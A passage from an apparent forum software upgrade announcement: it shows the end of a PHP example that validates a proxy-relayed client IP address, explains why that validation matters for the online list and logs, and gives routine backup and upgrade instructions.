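// Same header relayed by a trusted proxy: only a syntactically valid address survives.
$env['REMOTE_ADDR'] = '10.0.0.5';
var_dump(getip_safe($env));   // string(8) "10.0.0.5"
```

Validating the address is worth doing even with a parameterised query: the value is also written to the online list and to logs, and a header that never parses as an IP has no business in either.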

Before performing any upgrade please remember to backup your forum’s files and database and store them safely. If you have edited core files, including language files, please make sure you make a changelog for these changes so you can make them again (if necessary) once the upgrade is complete.

To upgrade, follow the Upgrading process. The upgrade script is required. There are changes to 9 language files and 9 templates were changed or added.

 

 


 

Edited by jasminee
